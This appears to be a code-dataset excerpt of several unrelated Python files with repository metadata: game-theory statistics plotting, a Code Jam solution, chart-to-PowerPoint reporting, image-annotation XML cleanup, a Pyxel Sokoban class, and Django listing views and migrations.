ds.cell(2 * game_num, 2).value = f"玩家A" # 标出A玩家
a_sco, b_sco = game_data["fin_score"][0], game_data["fin_score"][1] # 获取A\B玩家最终分数
ms.cell(1 + game_num, 2).value = (a_sco + b_sco) # 写入每局玩家总分之和
if render: render_data.append(a_sco + b_sco) # 添加渲染所需数据
ds.cell(2 * game_num, 3).value = f"{a_sco}" # 标出A玩家总分
ds.cell(2 * game_num + 1, 2).value = f"玩家B" # 标出B玩家
ds.cell(2 * game_num + 1, 3).value = f"{b_sco}" # 标出B玩家总分
for round_num, round_data in game_data["rounds"].items():
a_dec, a_gain = round_data["decisions"][0], round_data["changed"][0] # 获得A玩家策略与损益
b_dec, b_gain = round_data["decisions"][1], round_data["changed"][1] # 获得B玩家策略与损益
# 取消以下数据后表格中不再有False,True,而是背叛与合作
# a_dec ="合作" if a_dec else "背叛"
# b_dec ="合作" if b_dec else "背叛"
# 取消以下数据后表格中不再有False,True,而是0与1
# a_dec =1 if a_dec else 0
# b_dec =1if b_dec else 0
ds.cell(2 * game_num, 2 + round_num * 2).value = f"{a_dec}" # 标出A玩家策略
ds.cell(2 * game_num, 3 + round_num * 2).value = f"{a_gain}" # 标出A玩家损益
ds.cell(2 * game_num + 1, 2 + round_num * 2).value = f"{b_dec}" # 标出B玩家策略
ds.cell(2 * game_num + 1, 3 + round_num * 2).value = f"{b_gain}" # 标出B玩家损益
wb.save(file_name)
return render_data
def render(file_name, path, render_data):
items = {} # 存放各种结果出现的频数
for data in render_data: items[data] = items.get(data, 0) + 1.0 # 统计出成绩-频数键对值
x_y = [(x, y) for (x, y) in items.items()] # 转换数据结构
x_y.sort(key=lambda item: item[0]) # 对键对值进行排序
x, y_f, y_p = [], [], []
for item in x_y:
x.append(item[0]) # 升序存放得分
y_f.append(item[1]) # 存放对应得分的频数
y_p.append(item[1] / 1000) # 存放对应得分的频率
# 频数直方图
plt.xlabel("Score")
plt.ylabel("Frequency")
plt.bar(x, y_f) # 单局总分及其对应的频次
plt.plot(x, y_f) # 单局总分及其对应的频次
plt.bar([_ / 2 for _ in x], y_f) # 玩家平均分及其对应的频次
plt.show()
area=area_2_xaxis(x,y_f)
print("area:",area)
print(f"得分结果数量:{len(x)}")
# 概率密度图
plt.xlabel("Score")
plt.ylabel("Probability")
mean = np.mean(render_data) # 总分均值
var_f = np.var(render_data) # 频数分布方差
pro = [x[i] * y_p[i] for i in range(len(x))]
var_p = np.var(pro) # 频率分布方差
print(f"频数方差:{var_f}")
print(f"频率方差:{var_p}")
plt.plot(x, [y/area for y in y_f], linewidth=2)
# 进行正态分布曲线拟合尝试
mu, sigma_f,sigma_p = mean, math.sqrt(var_f),math.sqrt(var_p)
print("sigma_p:",sigma_p)
print("sigma_f:",sigma_f)
print("count 0:",render_data.count(0.0))
print("non-neg total score rate:",sum([1 for data in render_data if data >=0])/1000)
for sig in [sigma_f,]:
print(f"mu:{mean}\nsigma:{sigma_f}")
draw_normal_dis(mean,sig)
plt.show()
def area_2_xaxis(xs,ys):
#计算频数分布曲线下拉至x轴的面积
area=0
for i in range(len(xs)):
if i == len(xs)-1:
return area
else:
bottem=xs[i+1]-xs[i]
height=(ys[i+1]+ys[i])/2
area+=bottem*height
def draw_normal_dis(mu,sigma):
x_ = np.linspace(mu - 3 * sigma, mu + 3 * sigma, 50)
y_ = np.exp(-(x_ - mu) ** 2 / (2 * sigma ** 2)) / (math.sqrt(2 * math.pi) * sigma)
plt.plot(x_, y_, linewidth=2,color="coral")
|
[
"[email protected]"
] | |
d45b2df2ceb71ae350e9d6a317ee4e09741e503e
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_207/507.py
|
3881fca5b62b736452cde9286a5ba5618161c3b5
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,981 |
py
|
def validate(s):
pass
def solver(line):
n,r,o,y,g,b,v = line
t1 = b - o
t2 = y - v
t3 = r - g
if t1 < 0 or t2 < 0 or t3 < 0:
return "IMPOSSIBLE"
if 0 in [t1,t2,t3]:
if line[1:].count(0) == 4:
L = [(r,'R'),(o,'O'),(y,'Y'),(g,'G'),(b,'B'),(v,'V')]
L.sort(key = lambda x: -x[0])
if L[0][0] == L[1][0]:
return (L[0][1] + L[1][1]) * L[0][0]
else:
return "IMPOSSIBLE"
else:
return "IMPOSSIBLE"
L = [t1,t2,t3]
if sum(L) < 2 * max(L):
return "IMPOSSIBLE"
else:
L = [[t1,'B'],[t2,'Y'],[t3,'R']]
s = '_'
while sum(i[0] for i in L) > 3:
#error: haven't enforced start != end
L.sort(key = lambda x: -x[0])
if L[0][1] != s[-1]:
s += L[0][1]
L[0][0] -= 1
else:
s += L[1][1]
L[1][0] -= 1
if L[1][0] < 0:
print "bad stuff"
s = s[1:]
if s:
t = s[0] + s[-1]
else:
t = 'RR'
d = {'RR' : 'BRY',
'RY' : 'BRY',
'RB' : 'YRB',
'YR' : 'BYR',
'YY' : 'BYR',
'YB' : 'RYB',
'BR' : 'YBR',
'BY' : 'RBY',
'BB' : 'RBY'}
s += d[t]
s = s.replace('B','BO' * o + 'B', 1)
s = s.replace('Y','YV' * v + 'Y', 1)
s = s.replace('R','RG' * g + 'R', 1)
return s
#case testing needs to happen
fout = open('out.txt','w')
f = open('in.txt')
T = int(f.readline())
for case in range(1,T+1):
line = f.readline()
line = line.split()
line = [int(i) for i in line]
ans = solver(line)
str = "Case #%d: %s\n" % (case, ans)
print str,
fout.write(str)
f.close()
fout.close()
|
[
"[email protected]"
] | |
23dd9f6560ebd7e9a36a1242ce006af8f3c1d1db
|
8eb2306b6fdd1dfd687cc399af9a5ccdd5cfdeea
|
/make_snr.py
|
c811a13b201085633641ba8f80a3666e65197bbf
|
[] |
no_license
|
kangkulee/matplot-autoExcel-PPTX
|
12c3ab9bc5d7f56f89457f09142ceb3e1d6183be
|
9100e9882491c0ff90c8aa8860bd54b01bb604ad
|
refs/heads/master
| 2021-01-04T06:36:10.347447 | 2020-02-14T05:35:29 | 2020-02-14T05:35:29 | 240,432,964 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,281 |
py
|
from matplotlib import pyplot as plt, font_manager, rc
font_name = font_manager.FontProperties(fname="c:/Windows/Fonts/malgun.ttf").get_name()
rc('font', family=font_name)
import json
import openpyxl
import os
from pptx import Presentation
from pptx.util import Pt
from pptx.util import Inches
from datetime import date
import pptx
import boto3
# if __name__ == '__main__':
def make_snr():
#
datenow = str(date.today())[2:4] + str(date.today())[5:7] + str(date.today())[8:10]
name = 'tester'
filename = 'createCSV/' + datenow + 'test.csv'
excelname = 'Excel/' + datenow + 'test' + name + '.xlsx'
picturename = 'chartPicture/avgSnrChart_'
pptname = 'ppt/' + datenow + 'test' + name + '.pptx'
titletext = 'title'
f = open(filename, 'r')
station_key = dict()
station_col = 2 # 초기 기지국 별 셀 위치
xbar_row = 2 # 초기 x축 셀 위치
cnt_col = 2 # 초기 개수 셀 위치
cnt_row = 2 # 초기 개수 셀 위치
count = [] # 개수를 받는 빈 리스트 선언
#
# load pptx
prs = Presentation(pptname)
title_slide_layout = prs.slide_layouts[0]
slide = prs.slides.add_slide(title_slide_layout)
title = slide.shapes.title
subtitle = slide.placeholders[1]
title.text = "title"
subtitle.text = titletext
slide_layout = prs.slide_layouts[1]
slide = prs.slides.add_slide(slide_layout)
slide_title_shape = slide.shapes.title
slide_title_shape.text = "STATION LIST("+titletext+")"
slide_body_shape = slide.placeholders[1] # text box 객체
slide_body_tf = slide_body_shape.text_frame
# load excel
write_wb = openpyxl.load_workbook(excelname)
write_ws = write_wb.create_sheet('third')
for line in f:
rawdata = json.loads(line.replace("'", "\""))
if rawdata['payload']['station'] in station_key:
if rawdata['payload']['snr'] != 'null':
station_key[rawdata['payload']['station']].append(float(rawdata['payload']['snr']))
else:
if rawdata['payload']['snr'] != 'null':
station_key[rawdata['payload']['station']] = [float(rawdata['payload']['snr'])]
write_ws.cell(row=1, column=1, value='x축범위')
for items in station_key.items():
avg = round(sum(items[1]) / len(items[1]), 2)
ys, xs, patches = plt.hist(items[1], range=(0, 40), color='r', edgecolor='black', linewidth=1.2, rwidth=0.8, bins=40, alpha=0.4)
count.append(ys)
write_ws.cell(row=1, column=station_col, value='snr(station : ' + items[0] + ')')
station_col = station_col + 1
plt.xlabel('snr')
plt.ylabel('개수')
plt.title('snr 차트\n(station : ' + items[0] + ') 평균 : ' + str(avg))
plt.grid()
plt.axvline(avg, linestyle='--')
plt.minorticks_on()
check_picture = os.path.exists(picturename + items[0] + '.png')
if check_picture == True:
# delete picture
os.unlink(picturename + items[0] + '.png')
# save picture
plt.savefig(picturename + items[0] + '.png', dpi=500)
else:
# save picture
plt.savefig(picturename + items[0] + '.png', dpi=500)
# show chart
# plt.show()
plt.clf() # initialize
# save pptx
slide_p = slide_body_tf.add_paragraph()
slide_p.text = items[0]
slide_p.font.size = Pt(17)
slide_layout = prs.slide_layouts[6]
slide = prs.slides.add_slide(slide_layout)
slide.shapes.add_picture(picturename + items[0] + '.png', Inches(0.5), Inches(0.5), width=Inches(9), height=Inches(6))
prs.save(pptname)
# insert excel
for i in range(0,len(xs)-1):
write_ws.cell(row=xbar_row, column=1, value=xs[i])
xbar_row = xbar_row + 1
for i in range(len(count)):
for j in range(len(count[i])):
write_ws.cell(row=cnt_row, column=cnt_col, value=int(count[i][j]))
cnt_row = cnt_row + 1
if cnt_row == 42:
cnt_row = 2
cnt_col = cnt_col + 1
# save excel
write_wb.save(excelname)
|
[
"[email protected]"
] | |
d0cfa91a612e5464cf3ec459ef9654cb5a56acc1
|
f248e0801c1ca5fad15aa72791561803183ecb26
|
/so_copy.py
|
e2ba77e36d298c39c762316199150bfccd486665
|
[] |
no_license
|
646677064/tools_feature
|
b7b305cb11ffcc6d7b43a4d3ea3c8bab16d0791a
|
f7237bd18c4b17789d06769ee34aadfd478a1a2c
|
refs/heads/master
| 2021-06-22T05:57:19.469038 | 2019-08-28T10:50:13 | 2019-08-28T10:50:13 | 130,177,884 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 13,459 |
py
|
import argparse
from collections import OrderedDict
#from google.protobuf import text_format
#import matplotlib
# Force matplotlib to not use any Xwindows backend.
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import cv2
import numpy as np
import os
#import skimage.io as io
import sys
import xml.etree.ElementTree as ET
from xml.etree.ElementTree import ElementTree,Element
from xml.etree.ElementTree import SubElement
import cPickle
import random
import math
import sys,os,subprocess,commands
from subprocess import Popen,PIPE
def remove_Anotations(AnnotationDir,outDir):
print "==========="
# removelist_key = ["Maxwellhouse","G7"]
# removelist_key.append("Oldtown")
# removelist_key.append("Hougu")
# removelist_key.append("Kapalapi")
# removelist_key.append("Moka")
# removelist_key.append("coffee")
# removelist_key.append("kopiko")
# removelist_key.append("package1")
# removelist_key.append("package3")
# removelist_key.append("package4")
# removelist_key.append("package5")
# removelist_key.append("package10")
# removelist_key.append("package11")
# removelist_key.append("package17")
removelist_key = ["package1"]
removelist_key.append("package2")
removelist_key.append("package3")
removelist_key.append("package4")
removelist_key.append("package5")
removelist_key.append("package6")
removelist_key.append("package7")
removelist_key.append("package8")
removelist_key.append("package9")
removelist_key.append("package10")
removelist_key.append("package11")
removelist_key.append("package12")
removelist_key.append("package13")
removelist_key.append("package14")
removelist_key.append("package15")
removelist_key.append("package16")
removelist_key.append("package17")
f_list = os.listdir(AnnotationDir)
i=0
for file_comp4 in f_list:
if os.path.splitext(file_comp4)[1] == '.xml':
file_tmp = AnnotationDir+"/"+file_comp4
treeA=ElementTree()
treeA.parse(file_tmp)
width = int(treeA.find('size/width').text)
height = int(treeA.find('size/height').text)
depth = int(treeA.find('size/depth').text)
if width==0 or height==0 or depth==0:
print file_comp4,"width==0 or height==0 or depth==0"
break
bfind_one_space = False;
# if JPEG_Dir!="":
# im = cv2.imread(JPEG_Dir+os.path.splitext(file_comp4)[0]+".jpg")
# #sp = im.shape
# imheight = im.shape[0]
# imwidth = im.shape[1]
# imdepth = im.shape[2]
# if imwidth!=width or imheight!=height or imdepth!=depth :
# bfind_one_space = True
# print file_comp4,"width,height,depth error"
# treeA.find('size/width').text = str(imwidth)
# treeA.find('size/height').text =str(imheight)
# treeA.find('size/depth').text =str(imdepth)
# anno = treeA.find("annotation")
# children = anno.getchildren()
# for child in children:
# if child.tag=="object":
# if child.find('name').text in removelist_key:
# bfind_one_space = True
# children.remove(child)
rootA=treeA.getroot()
print rootA.tag
children = rootA.findall('object')
for obj in children:
xmlname = obj.find('name').text
xmlname = xmlname.strip()
# if xmlname=="Others1" :
# i=i+1
# print file_comp4
# bfind_one_space = True
# #obj.set("name","Mini Oreo SDW 55g*24 Strawberry")
# obj.find('name').text="others1"
xmin = int(obj.find('bndbox').find('xmin').text)
ymin = int(obj.find('bndbox').find('ymin').text)
xmax = int(obj.find('bndbox').find('xmax').text)
ymax = int(obj.find('bndbox').find('ymax').text)
if xmin<=0 :
bfind_one_space = True
obj.find('bndbox').find('xmin').text = str(1)
if ymin<=0 :
bfind_one_space = True
obj.find('bndbox').find('ymin').text = str(1)
if xmax>= width :
bfind_one_space = True
obj.find('bndbox').find('xmax').text = str(width-1)
if ymax>= height :
bfind_one_space = True
obj.find('bndbox').find('ymax').text = str(height-1)
if xmin>=xmax or ymin>= ymax:
print file_comp4
if xmlname in removelist_key:
print xmlname
bfind_one_space = True
name_s = obj.findall('name')
pose_s = obj.findall('pose')
truncated_s = obj.findall('truncated')
difficult_s = obj.findall('difficult')
bndbox_s = obj.findall('bndbox')
for oobj in name_s:
obj.remove(oobj)
for oobj in pose_s:
obj.remove(oobj)
for oobj in truncated_s:
obj.remove(oobj)
for oobj in difficult_s:
obj.remove(oobj)
for oobj in bndbox_s:
# xmin_s = oobj.findall('xmin')
# ymin_s = oobj.findall('ymin')
# xmax_s = oobj.findall('xmax')
# ymax_s = oobj.findall('ymax')
# for ooobj in xmin_s:
# oobj.remove(ooobj)
# for ooobj in ymin_s:
# oobj.remove(ooobj)
# for ooobj in xmax_s:
# oobj.remove(ooobj)
# for ooobj in ymax_s:
# oobj.remove(ooobj)
obj.remove(oobj)
rootA.remove(obj)
if bfind_one_space==True:
#print file_comp4
#print treeA
treeA.write(outDir+file_comp4, encoding="utf-8",xml_declaration=False)
print i
def Popen_do(pp_string,b_pip_stdout=True):
#print pp_string
if b_pip_stdout==True:
p = Popen(pp_string, shell=True, stdout=PIPE, stderr=PIPE)#,close_fds=True)
else:
p = Popen(pp_string, shell=True, stderr=PIPE)#,close_fds=True)
out, err = p.communicate()
#p.wait()
print pp_string
if p.returncode != 0:
print err
#return 0
return 1
def find_and_remove_cp_file(skufile,dir_1,outDir):
with open(skufile,"r") as sku_f:
sku_lines_1 = sku_f.readlines();
test_sku=[]
for i_sku,test_sku1 in enumerate(sku_lines_1):
#for i_file,test_file in enumerate(test_filelist_lines):
#print test_sku
test_sku1 = test_sku1.strip().strip('\n').strip('\r')
test_sku.append(test_sku1)
f_list = os.listdir(dir_1+"/Annotations/")
for file_comp4 in f_list:
#print fname
basename=os.path.splitext(file_comp4)[0]
orig_xml=dir_1+"/Annotations/"+basename+".xml"
orig_pic=dir_1+"/JPEGImages/"+basename+".jpg"
# ppsring= "cp "+orig_xml+" "+des_dir+"/Annotations/"
# assert Popen_do(ppsring),ppsring+" error!"
# ppsring= "cp "+orig_pic+" "+des_dir+"/JPEGImages/"
# assert Popen_do(ppsring),ppsring+" error!"
if os.path.splitext(file_comp4)[1] == '.xml':
file_tmp = dir_1+"/Annotations/"+file_comp4
treeA=ElementTree()
treeA.parse(file_tmp)
width = int(treeA.find('size/width').text)
height = int(treeA.find('size/height').text)
depth = int(treeA.find('size/depth').text)
if width==0 or height==0 or depth==0:
print file_comp4,"width==0 or height==0 or depth==0"
break
bfind_one_space = False;
rootA=treeA.getroot()
#print rootA.tag
children = rootA.findall('object')
for obj in children:
xmlname = obj.find('name').text
if xmlname in test_sku:
bfind_one_space=True
break
if bfind_one_space==True:
for obj in children:
xmlname = obj.find('name').text
if xmlname not in test_sku:
name_s = obj.findall('name')
pose_s = obj.findall('pose')
truncated_s = obj.findall('truncated')
difficult_s = obj.findall('difficult')
bndbox_s = obj.findall('bndbox')
for oobj in name_s:
obj.remove(oobj)
for oobj in pose_s:
obj.remove(oobj)
for oobj in truncated_s:
obj.remove(oobj)
for oobj in difficult_s:
obj.remove(oobj)
for oobj in bndbox_s:
# xmin_s = oobj.findall('xmin')
# ymin_s = oobj.findall('ymin')
# xmax_s = oobj.findall('xmax')
# ymax_s = oobj.findall('ymax')
# for ooobj in xmin_s:
# oobj.remove(ooobj)
# for ooobj in ymin_s:
# oobj.remove(ooobj)
# for ooobj in xmax_s:
# oobj.remove(ooobj)
# for ooobj in ymax_s:
# oobj.remove(ooobj)
obj.remove(oobj)
rootA.remove(obj)
if bfind_one_space==True:
#print file_comp4
#print treeA
treeA.write(outDir+"/Annotations/"+file_comp4, encoding="utf-8",xml_declaration=False)
orig_pic=dir_1+"//JPEGImages/"+basename+".jpg"
ppsring= "cp "+orig_pic+" "+outDir+"/JPEGImages/"
assert Popen_do(ppsring),ppsring+" error!"
if __name__ == "__main__":
dir_1="/storage2/tiannuodata/work/projdata/baiwei0317-2472-1/baiwei0317-2472-1proj1//"
dir_2="/storage2/tiannuodata/work/projdata/baiwewi0301-2323/baiwewi0301-2323proj1//"
des_dir="/home/liushuai/medical/kele/keleproj1/"
test_filepath="/storage2/tiannuodata/work/projdata/baiwei/baiweiproj1//ImageSets/Main/test.txt"
# pp_stirng = "mv "+unzip_dir+"/*.jpg "+unzip_dir+"/JPEG/"
# assert Popen_do(pp_stirng),pp_stirng+" error!"
with open(test_filepath,"r") as f:
test_filelist_lines = f.readlines();
test_list=[]
for i_file,test_file in enumerate(test_filelist_lines):
#for i_file,test_file in enumerate(test_filelist_lines):
print test_file
temp_file = test_file.strip().strip('\n').strip('\r')
test_list.append(temp_file)
# f_list = os.listdir(dir_1+"/Annotations/")
# for fname in f_list:
# if fname in test_list:
# continue
# #print fname
# basename=os.path.splitext(fname)[0]
# orig_xml=dir_1+"/Annotations/"+basename+".xml"
# orig_pic=dir_1+"/JPEGImages/"+basename+".jpg"
# ppsring= "cp "+orig_xml+" "+des_dir+"/Annotations/"
# assert Popen_do(ppsring),ppsring+" error!"
# ppsring= "cp "+orig_pic+" "+des_dir+"/JPEGImages/"
# assert Popen_do(ppsring),ppsring+" error!"
# f_list = os.listdir(dir_2+"/Annotations/")
# for fname in f_list:
# if fname in test_list:
# continue
# basename=os.path.splitext(fname)[0]
# orig_xml=dir_2+"/Annotations/"+basename+".xml"
# orig_pic=dir_2+"/JPEGImages/"+basename+".jpg"
# ppsring= "cp "+orig_xml+" "+des_dir+"/Annotations/"
# assert Popen_do(ppsring),ppsring+" error!"
# ppsring= "cp "+orig_pic+" "+des_dir+"/JPEGImages/"
# assert Popen_do(ppsring),ppsring+" error!"
# tmp= test_file.split(' ')
# if 2<len(tmp):
# #print test_file.split(' ')[2]
# ppsring= "cp "+tmp[2]+" "+des_dir
# assert Popen_do(ppsring),ppsring+" error!"
AnnotationDir="/home/liushuai/medical/kele/keleproj1/Annotations_package/"
outDir="/home/liushuai/medical/kele/keleproj1/Annotations/"
#remove_Anotations(AnnotationDir,outDir)
AnnotationDir="/home/liushuai/medical/kele/keleproj1/Annotations_package/"
skufile="/storage2/tiannuodata/work/projdata/baiwei/329/329.txt"
dir_1="/storage2/tiannuodata/work/projdata/baiwei/baiweiproj1//"
outDir="/storage2/tiannuodata/work/projdata/baiwei/329/"
find_and_remove_cp_file(skufile,dir_1,outDir)
skufile="/storage2/tiannuodata/work/projdata/baiwei/66/66.txt"
dir_1="/storage2/tiannuodata/work/projdata/baiwei/baiweiproj1//"
outDir="/storage2/tiannuodata/work/projdata/baiwei/66/"
find_and_remove_cp_file(skufile,dir_1,outDir)
|
[
"[email protected]"
] | |
d555be3771021d1b7a4deba78b2e8fb2f62044dc
|
5f80015d9245f8ecd1b29a644dd9ce447c78ea59
|
/box.py
|
debaae91e1fb9c57958c0a1e192ff6b1eac34ef0
|
[] |
no_license
|
leocody/Leokoban
|
9fec33a542c198959af2692769f24805e790956a
|
8ca582c2ac79dee95f6b91545773ad08e256510e
|
refs/heads/master
| 2022-07-12T11:07:13.942456 | 2020-05-16T05:19:03 | 2020-05-16T05:19:03 | 262,753,692 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,139 |
py
|
import pyxel
from constant import PYSIZE, HALFPYSIZE, WALL, U_to_D, D_to_U, L_to_R, R_to_L
class Box:
def __init__(self, x, y):
self.x = x
self.y = y
#Move Logic
def move_up(self):
self.y -= 1
def move_down(self):
self.y += 1
def move_left(self):
self.x -= 1
def move_right(self):
self.x += 1
#DRAW LOGIC
def draw(self):
pyxel.blt(self.x * PYSIZE, self.y * PYSIZE, 0, 48, 0, 16, 16)
def is_collision(self, player_nxt_pos_x, player_nxt_pos_y):
if player_nxt_pos_x == self.x and player_nxt_pos_y == self.y:
return True
else:
return False
def can_move(self, stage, other_boxes, direction):
if self.no_wall(stage, direction) and self.no_boxes(other_boxes, direction):
return True
return False
def no_wall(self, stage, direction):
if direction == D_to_U:
kind = stage.get_kind(self.x, self.y - 1)
if direction == U_to_D:
kind = stage.get_kind(self.x, self.y + 1)
if direction == L_to_R:
kind = stage.get_kind(self.x + 1, self.y)
if direction == R_to_L:
kind = stage.get_kind(self.x - 1, self.y)
if kind == WALL:
return False
return True
def no_boxes(self, other_boxes, direction):
if direction == L_to_R:
for other_box in other_boxes:
if self.x + 1 == other_box.x and self.y == other_box.y:
return False
if direction == R_to_L:
for other_box in other_boxes:
if self.x - 1 == other_box.x and self.y == other_box.y:
return False
if direction == U_to_D:
for other_box in other_boxes:
if self.x == other_box.x and self.y + 1 == other_box.y:
return False
if direction == D_to_U:
for other_box in other_boxes:
if self.x == other_box.x and self.y - 1 == other_box.y:
return False
return True
|
[
"[email protected]"
] | |
0efe388f3e3a95551a15c6e5f3c3ac7d3ae444c5
|
b9062ed0431544160161a270fe669858c3ca9633
|
/blog/migrations/0003_auto_20191101_2319.py
|
f9b453d4abd8102f08dc12a51a8acc1e12851805
|
[] |
no_license
|
sd8917/LearnDjango
|
350f73ed7077d0b3ac9aa2f1e0fd7d05f67faf05
|
87a9c6c5932f685a01ad6125faf81ac94a1fac5d
|
refs/heads/master
| 2022-12-03T18:18:13.770896 | 2019-11-05T06:35:32 | 2019-11-05T06:35:32 | 219,081,219 | 1 | 0 | null | 2022-11-22T04:36:24 | 2019-11-02T00:14:05 |
Python
|
UTF-8
|
Python
| false | false | 443 |
py
|
# Generated by Django 2.2.6 on 2019-11-01 17:49
import ckeditor_uploader.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_auto_20191101_1435'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='content',
field=ckeditor_uploader.fields.RichTextUploadingField(),
),
]
|
[
"[email protected]"
] | |
11879abc6c2945784b1f79ae6a4f6f553439f8fb
|
997ccf1121c05e1d860f7ca49d3e5b0e382e473f
|
/listings/views.py
|
b66ac8b65a71f06c72986f16c2c1bacc1b671fe8
|
[] |
no_license
|
alamin2khl/dj_rs
|
57b9ddf0a5c875dbf8c40e8bf18a4c47da303326
|
364971c262ccf9383306ea07fc331193f512493b
|
refs/heads/master
| 2023-04-26T13:32:15.666633 | 2021-04-27T07:23:55 | 2021-04-27T07:23:55 | 208,812,047 | 0 | 0 | null | 2023-04-21T20:37:52 | 2019-09-16T13:51:55 |
CSS
|
UTF-8
|
Python
| false | false | 2,089 |
py
|
from django.shortcuts import get_object_or_404, render
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from .choices import bedroom_choices, price_choices, state_choices
from .models import Listing
def index(request):
# listings = Listing.objects.all()
# listings = Listing.objects.order_by('-list_date')
listings = Listing.objects.order_by('-list_date').filter(is_published=True)
paginator = Paginator(listings, 3)
page = request.GET.get('page')
paged_listings = paginator.get_page(page)
context = {
# 'listings': listings
'listings': paged_listings
}
return render(request, 'listings/listings.html', context)
def listing(request, listing_id):
listing = get_object_or_404(Listing, pk=listing_id)
context = {
'listing': listing
}
return render(request, 'listings/listing.html', context)
def search(request):
queryset_list = Listing.objects.order_by('-list_date')
# Keywords
if 'keywords' in request.GET:
keywords = request.GET['keywords']
if keywords:
queryset_list = queryset_list.filter(description__icontains=keywords)
# City
if 'city' in request.GET:
city = request.GET['city']
if city:
queryset_list = queryset_list.filter(city__iexact=city)
# State
if 'state' in request.GET:
state = request.GET['state']
if state:
queryset_list = queryset_list.filter(state__iexact=state)
# Bedrooms
if 'bedrooms' in request.GET:
bedrooms = request.GET['bedrooms']
if bedrooms:
queryset_list = queryset_list.filter(bedrooms__lte=bedrooms)
# Price
if 'price' in request.GET:
price = request.GET['price']
if price:
queryset_list = queryset_list.filter(price__lte=price)
paginator = Paginator(queryset_list, 2)
page = request.GET.get('page')
paged_listings = paginator.get_page(page)
context = {
'bedroom_choices': bedroom_choices,
'price_choices': price_choices,
'state_choices': state_choices,
'listings': paged_listings,
'values': request.GET
}
return render(request, 'listings/search.html', context)
|
[
"[email protected]"
] | |
4b4303583c7508d156fe4cd85149381e4f8a32c2
|
ec6d6c6473bc63a44c5b820a19808877f0b494b2
|
/urlapp/migrations/0001_initial.py
|
57d7b80ccaa4e3d3e64d23697ce182476379acab
|
[] |
no_license
|
deepakkumar9470/django-url-shortner
|
d1642ac5c4d94cce259fec5024c5ecce6cc25f46
|
3b36e4b4b3dabda9b8971d45c40dc3ca082659b5
|
refs/heads/master
| 2023-07-29T06:13:24.867869 | 2021-09-12T12:39:55 | 2021-09-12T12:39:55 | 405,627,527 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 587 |
py
|
# Generated by Django 3.2.7 on 2021-09-12 04:26
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='UrlModel',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_url', models.CharField(max_length=10000, unique=True)),
('short_url', models.CharField(max_length=50, unique=True)),
],
),
]
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.